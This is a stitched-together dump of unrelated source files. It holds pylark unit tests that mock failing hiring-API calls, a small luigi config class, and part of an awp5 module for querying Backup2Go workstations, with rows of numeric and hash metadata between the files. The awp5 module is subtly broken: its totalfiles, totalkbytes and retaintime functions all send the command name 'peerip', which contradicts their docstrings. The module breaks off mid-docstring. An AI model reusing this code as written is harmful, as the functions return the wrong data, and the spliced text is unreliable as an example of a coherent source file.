def test_mock_self_func_update_hire_note(self):
origin_func = self.module_cli.update_hire_note
self.module_cli.update_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_note(pylark.UpdateHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_hire_note = origin_func
def test_mock_self_func_get_hire_note(self):
origin_func = self.module_cli.get_hire_note
self.module_cli.get_hire_note = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note(pylark.GetHireNoteReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_note = origin_func
def test_mock_self_func_get_hire_note_list(self):
origin_func = self.module_cli.get_hire_note_list
self.module_cli.get_hire_note_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_note_list = origin_func
def test_mock_self_func_get_hire_referral_by_application(self):
origin_func = self.module_cli.get_hire_referral_by_application
self.module_cli.get_hire_referral_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_referral_by_application(
pylark.GetHireReferralByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_referral_by_application = origin_func
def test_mock_self_func_get_hire_job_process_list(self):
origin_func = self.module_cli.get_hire_job_process_list
self.module_cli.get_hire_job_process_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_job_process_list = origin_func
def test_mock_self_func_create_hire_application(self):
origin_func = self.module_cli.create_hire_application
self.module_cli.create_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.create_hire_application = origin_func
def test_mock_self_func_terminate_hire_application(self):
origin_func = self.module_cli.terminate_hire_application
self.module_cli.terminate_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.terminate_hire_application(
pylark.TerminateHireApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.terminate_hire_application = origin_func
def test_mock_self_func_get_hire_application(self):
origin_func = self.module_cli.get_hire_application
self.module_cli.get_hire_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application(pylark.GetHireApplicationReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application = origin_func
def test_mock_self_func_get_hire_application_list(self):
origin_func = self.module_cli.get_hire_application_list
self.module_cli.get_hire_application_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_list(
pylark.GetHireApplicationListReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application_list = origin_func
def test_mock_self_func_get_hire_application_interview_list(self):
origin_func = self.module_cli.get_hire_application_interview_list
self.module_cli.get_hire_application_interview_list = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_interview_list(
pylark.GetHireApplicationInterviewListReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_application_interview_list = origin_func
def test_mock_self_func_get_hire_offer_by_application(self):
origin_func = self.module_cli.get_hire_offer_by_application
self.module_cli.get_hire_offer_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_by_application(
pylark.GetHireOfferByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_offer_by_application = origin_func
def test_mock_self_func_get_hire_offer_schema(self):
origin_func = self.module_cli.get_hire_offer_schema
self.module_cli.get_hire_offer_schema = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_schema(pylark.GetHireOfferSchemaReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_offer_schema = origin_func
def test_mock_self_func_make_hire_transfer_onboard_by_application(self):
origin_func = self.module_cli.make_hire_transfer_onboard_by_application
self.module_cli.make_hire_transfer_onboard_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.make_hire_transfer_onboard_by_application(
pylark.MakeHireTransferOnboardByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.make_hire_transfer_onboard_by_application = origin_func
def test_mock_self_func_update_hire_employee(self):
origin_func = self.module_cli.update_hire_employee
self.module_cli.update_hire_employee = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_employee(pylark.UpdateHireEmployeeReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.update_hire_employee = origin_func
def test_mock_self_func_get_hire_employee_by_application(self):
origin_func = self.module_cli.get_hire_employee_by_application
self.module_cli.get_hire_employee_by_application = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee_by_application(
pylark.GetHireEmployeeByApplicationReq()
)
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_employee_by_application = origin_func
def test_mock_self_func_get_hire_employee(self):
origin_func = self.module_cli.get_hire_employee
self.module_cli.get_hire_employee = mock
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee(pylark.GetHireEmployeeReq())
assert "msg=mock-failed" in f"{e}"
self.module_cli.get_hire_employee = origin_func
# mock raw request
class TestHireSampleMockRawRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestHireSampleMockRawRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_all_permission.ins()
self.module_cli = self.cli.hire
self.cli.raw_request = mock_raw_request
def test_mock_raw_request_get_hire_job(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job(
pylark.GetHireJobReq(
job_id=1,
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_job_manager(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_manager(
pylark.GetHireJobManagerReq(
job_id="x",
manager_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_talent(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_talent(
pylark.GetHireTalentReq(
talent_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_attachment(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment(
pylark.GetHireAttachmentReq(
attachment_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_attachment_preview(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment_preview(
pylark.GetHireAttachmentPreviewReq(
attachment_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_resume_source(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_note(
pylark.UpdateHireNoteReq(
note_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note(
pylark.GetHireNoteReq(
note_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_note_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_referral_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_referral_by_application(
pylark.GetHireReferralByApplicationReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_job_process_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_create_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_terminate_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.terminate_hire_application(
pylark.TerminateHireApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application(
pylark.GetHireApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_application_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_list(
pylark.GetHireApplicationListReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_application_interview_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_interview_list(
pylark.GetHireApplicationInterviewListReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_offer_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_by_application(
pylark.GetHireOfferByApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_offer_schema(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_schema(
pylark.GetHireOfferSchemaReq(
offer_schema_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_make_hire_transfer_onboard_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.make_hire_transfer_onboard_by_application(
pylark.MakeHireTransferOnboardByApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_update_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_employee(
pylark.UpdateHireEmployeeReq(
employee_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_employee_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee_by_application(
pylark.GetHireEmployeeByApplicationReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
def test_mock_raw_request_get_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee(
pylark.GetHireEmployeeReq(
employee_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
assert "mock-raw-request-failed" in e.value.msg
# real request
class TestHireSampleRealRequestFailed(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestHireSampleRealRequestFailed, self).__init__(*args, **kwargs)
self.cli = app_no_permission.ins()
self.module_cli = self.cli.hire
def test_real_request_get_hire_job(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job(
pylark.GetHireJobReq(
job_id=1,
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_job_manager(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_manager(
pylark.GetHireJobManagerReq(
job_id="x",
manager_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_talent(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_talent(
pylark.GetHireTalentReq(
talent_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_attachment(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment(
pylark.GetHireAttachmentReq(
attachment_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_attachment_preview(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_attachment_preview(
pylark.GetHireAttachmentPreviewReq(
attachment_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_resume_source(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_resume_source(pylark.GetHireResumeSourceReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_note(pylark.CreateHireNoteReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_note(
pylark.UpdateHireNoteReq(
note_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_note(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note(
pylark.GetHireNoteReq(
note_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_note_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_note_list(pylark.GetHireNoteListReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_referral_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_referral_by_application(
pylark.GetHireReferralByApplicationReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_job_process_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_job_process_list(pylark.GetHireJobProcessListReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_create_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.create_hire_application(pylark.CreateHireApplicationReq())
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_terminate_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.terminate_hire_application(
pylark.TerminateHireApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application(
pylark.GetHireApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_application_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_list(
pylark.GetHireApplicationListReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_application_interview_list(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_application_interview_list(
pylark.GetHireApplicationInterviewListReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_offer_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_by_application(
pylark.GetHireOfferByApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_offer_schema(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_offer_schema(
pylark.GetHireOfferSchemaReq(
offer_schema_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_make_hire_transfer_onboard_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.make_hire_transfer_onboard_by_application(
pylark.MakeHireTransferOnboardByApplicationReq(
application_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_update_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.update_hire_employee(
pylark.UpdateHireEmployeeReq(
employee_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_employee_by_application(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee_by_application(
pylark.GetHireEmployeeByApplicationReq()
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
def test_real_request_get_hire_employee(self):
with pytest.raises(pylark.PyLarkError) as e:
self.module_cli.get_hire_employee(
pylark.GetHireEmployeeReq(
employee_id="x",
)
)
assert e.type is pylark.PyLarkError
assert e.value.code > 0
| 36.717811
| 88
| 0.666024
| 4,259
| 34,221
| 5.027706
| 0.026532
| 0.061131
| 0.100173
| 0.088918
| 0.971279
| 0.969785
| 0.953626
| 0.938122
| 0.901975
| 0.85845
| 0
| 0.001966
| 0.256772
| 34,221
| 931
| 89
| 36.75725
| 0.839939
| 0.003185
| 0
| 0.623229
| 1
| 0
| 0.03882
| 0.016185
| 0
| 0
| 0
| 0
| 0.228045
| 1
| 0.13881
| false
| 0
| 0.007082
| 0
| 0.151558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18c942c655708445dfaca011c4c8751a24f1fe3d
| 213
|
py
|
Python
|
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | 3
|
2019-06-28T13:46:26.000Z
|
2020-06-11T13:36:19.000Z
|
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | null | null | null |
luigi_soft_failures/config.py
|
0xddom/luigi_soft_failures
|
b4ecaae22daec5f14c1491de7326baa787930bc8
|
[
"MIT"
] | 1
|
2022-02-28T15:18:24.000Z
|
2022-02-28T15:18:24.000Z
|
import luigi
import os
class Config(luigi.Config):
task_namespace = 'luigi_soft_failures'
output_dir = luigi.Parameter(
default=os.environ.get('LUIGI_SOFT_FAILURES_OUTPUT_DIR', 'soft_failures'))
| 23.666667
| 82
| 0.751174
| 28
| 213
| 5.392857
| 0.535714
| 0.238411
| 0.225166
| 0.304636
| 0.344371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150235
| 213
| 8
| 83
| 26.625
| 0.834254
| 0
| 0
| 0
| 0
| 0
| 0.29108
| 0.140845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
18ec531abb6d805c31cac661ab3f74547cf70860
| 23,895
|
py
|
Python
|
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | 2
|
2019-04-10T16:46:19.000Z
|
2020-08-18T21:57:59.000Z
|
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | null | null | null |
awp5/api/workstation.py
|
ThomasWaldinger/py_awp5
|
10077ab81eab506bea58a67242c2d550988ec18c
|
[
"Apache-2.0"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Thomas Waldinger. All rights reserved.
# Licensed under the Apache License, Version 2.0. See
# License.txt in the project root for license
# information.
# ---------------
"""
Workstation
Queries Backup2Go workstation resources configured on the Backup2Go Server and
queries and controls their parameters. These commands are to be executed on the
Backup2Go server.
A P5 workstation is the computer running the P5 client software in a Backup2Go
infrastructure. To configure and maintain workstation resources, use the
standard system-administrator account in the P5 Web GUI
"""
from awp5.base.connection import P5Resource, exec_nsdchat
from awp5.base.helpers import resourcelist, onereturnvalue
from awp5.api.backup2go import Backup2Go
module_name = "Workstation"
def names(as_object=False, p5_connection=None):
"""
Syntax: Workstation names
Description: Returns the list of names of all workstations
Return Values:
-On Success: the list of names
"""
method_name = "names"
result = exec_nsdchat([module_name, method_name], p5_connection)
if not as_object:
return result
else:
return resourcelist(result, Workstation, p5_connection)
@onereturnvalue
def describe(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> describe
Description: Returns a human-readable description of the workstation
<name>.
If the workstation does not have a description assigned, the command
returns the string "<empty>"
Return Values:
-On Success: the workstation description
"""
method_name = "describe"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def disabled(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> disabled
Description: Queries the workstations Disabled status
Return Values:
-On Success: the string "1" (disabled) or "0" (enabled)
"""
method_name = "disabled"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def enabled(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> enabled
Description: Queries the workstation Enabled status
Return Values:
-On Success: the string "1" (enabled) or "0" (disabled)
"""
method_name = "enabled"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def hostid(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> hostid
Description: Returns the configured P5 machine-ID of the workstation
<name>.
Return Values:
-On Success: the workstation's machine ID
"""
method_name = "hostid"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def lastbegin(workstation_name, p5_connection=None):
"""
Syntax: Workstation<name> lastbegin
Description: Returns the absolute time in seconds (Posix time) of the start
of the last backup operation for the workstation <name>
Return Values:
-On Success: the time in seconds (Posix time)
"""
method_name = "lastbegin"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def lastend(workstation_name, p5_connection=None):
"""
Syntax: Workstation<name> lastend
Description: Returns the absolute time in seconds (Posix time) of the
successful end of the last backup operation for the workstation <name>.
This time may be older then the time returned by the lastbegin method
indicating an incomplete (interrupted) backup.
Return Values:
-On Success: the time in seconds (Posix time)
"""
method_name = "lastend"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def lasterror(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> lasterror
Description: Returns the error message that resulted from the last backup
run for the workstation <name>.
The string "<empty>" is returned in case there is no last error.
Return Values:
-On Success: the error message or the string "<empty>"
"""
method_name = "lasterror"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def nextrun(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> nextrun
Description: Returns the absolute time in seconds (Posix time) of the next
anticipated backup of the workstation
Return Values:
-On Success: the time in seconds (Posix time)
"""
method_name = "nextrun"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def peerip(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> peerip
Description: Returns the last known IP of the workstation <name>. If the
workstation does not have an IP recorded so far (for example, it never got
connected to the server), the command returns the string "<empty>"
Return Values:
-On Success: the workstation IP address in standard dot notation
"""
method_name = "peerip"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def snapshots(workstation_name, since="", p5_connection=None):
"""
Syntax: Workstation <name> snapshots [<since>]
Description: Returns a list of snapshots maintained for the given
workstation. The optional <since> argument may be given in seconds (Posix
time) to address only snapshots since that date. Otherwise all known
snapshots are returned.
Return Values:
-On Success: a list of snapshots IDs
"""
method_name = "snapshots"
return exec_nsdchat([module_name, workstation_name, method_name, since],
p5_connection)
@onereturnvalue
def snapsize(workstation_name, snapshotId, p5_connection=None):
"""
Syntax: Workstation <name> snapsize [<snapshotId>]
Description: Returns the allocated size in KBytes of data maintained for
the named workstation.
On link based snapshots, one or multiple <snapshotId> arguments (as
returned by the snapshots method) can be given. The return value is then
the allocated size for the current and all optional given snapshots summed
up. On native snapshots (ZFS, BTRFS), this method accepts one or none
<snapshotId> as parameter. If a snapshot ID is given, the logical size of
that snapshot is returned, otherwise the size of the current state is
returned. The return value does not reflect the required disk space of
native snapshots. All returned sizes are in Kbyte.
Note that this may be a lengthy operation, depending on the number of files
and snapshots.
Return Values:
-On Success: the number of KBytes
"""
method_name = "snapsize"
return exec_nsdchat([module_name, workstation_name, method_name,
snapshotId], p5_connection)
@onereturnvalue
def totalfiles(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> totalfiles
Description: Returns the number of files transferred from the workstation
<name> in the last backup operation
Return Values:
-On Success: the number of files
"""
method_name = "peerip"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def totalkbytes(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> totalkbytes
Description: Returns the number of KBytes transferred from the workstation
<name> in the last backup operation
Return Values:
-On Success: the number of KBytes
"""
method_name = "peerip"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def retaintime(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> retaintime
Description: Returns the retention time setting for workstation snapshots.
Return Values:
-On Success: the retention time in seconds
"""
method_name = "peerip"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def template(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> template
Description: Returns the template ID for workstation <name>.
Return Values:
-On Success: the template ID
"""
method_name = "template"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def configure(hostname, port, username, password, template="",
p5_connection=None):
"""
Syntax: Workstation configure <hostname> <port> <username> <password>
[<template>]
Description: Run this command on the P5 Backup2Go Server.
Using the passed connection parameters <hostname> and <port>, tries to
establish the connection to the remote workstation and, based on it's host
ID, create or reuse the workstation record on the server.
For the purpose of logging in to the server, the workstation will be seeded
with a unique token, shared by the workstation and the server. This
eliminates the need for storing the <username> and/or <password> for
accessing the server on the workstation.
If the optional <template> is given, the workstation is set to use the
given template. Otherwise the workstation is set to use the generic
template.
Return Values:
-On Success: a positive integer as a string
(the name of the new local workstation)
-On Failure: the string "-3": the template could not be set
the string "-2": a wrong user name/password is given
the string "-1": there is a network connection problem
(bad address and/or port)
"""
method_name = "configure"
return exec_nsdchat([module_name, method_name, hostname, port, username,
password, template], p5_connection)
@onereturnvalue
def disable(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> disable
Description: Sets the workstation to the Disabled state
Return Values:
-On Success: the string "0"
"""
method_name = "disable"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def enable(workstation_name, p5_connection=None):
"""
Syntax: Workstation <name> enable
Description: Sets the workstation to the Enabled state
Return Values:
-On Success: the string "1"
"""
method_name = "enable"
return exec_nsdchat([module_name, workstation_name, method_name],
p5_connection)
@onereturnvalue
def name(p5_connection=None):
"""
Syntax: Workstation name
Description: Returns the Workstation ID of the workstation where the
command is executed
Note:
Unlike all the other workstation commands, this command must be called on
the Workstation
Return Values:
-On Success: the ID or the string “unknown”
"""
method_name = "name"
return exec_nsdchat([module_name, method_name], p5_connection)
class Workstation(P5Resource):
def __init__(self, workstation_name, p5_connection=None):
super().__init__(workstation_name, p5_connection)
def names(as_object=True, p5_connection=None):
"""
Syntax: Workstation names
Description: Returns the list of names of all workstations
Return Values:
-On Success: the list of names
"""
method_name = "names"
result = exec_nsdchat([module_name, method_name], p5_connection)
if not as_object:
return result
else:
return resourcelist(result, Workstation, p5_connection)
@onereturnvalue
def describe(self):
"""
Syntax: Workstation <name> describe
Description: Returns a human-readable description of the workstation
<name>. If the workstation does not have a description assigned, the
command returns the string "<empty>"
Return Values:
-On Success: the workstation description
"""
method_name = "describe"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def disabled(self):
"""
Syntax: Workstation <name> disabled
Description: Queries the workstations Disabled status
Return Values:
-On Success: the string "1" (disabled) or "0" (enabled)
"""
method_name = "disabled"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def enabled(self):
"""
Syntax: Workstation <name> enabled
Description: Queries the workstation Enabled status
Return Values:
-On Success: the string "1" (enabled) or "0" (disabled)
"""
method_name = "enabled"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def hostid(self):
"""
Syntax: Workstation <name> hostid
Description: Returns the configured P5 machine-ID of the workstation
<name>.
Return Values:
-On Success: the workstation's machine ID
"""
method_name = "hostid"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def lastbegin(self):
"""
Syntax: Workstation<name> lastbegin
Description: Returns the absolute time in seconds (Posix time) of the
start of the last backup operation for the workstation <name>
Return Values:
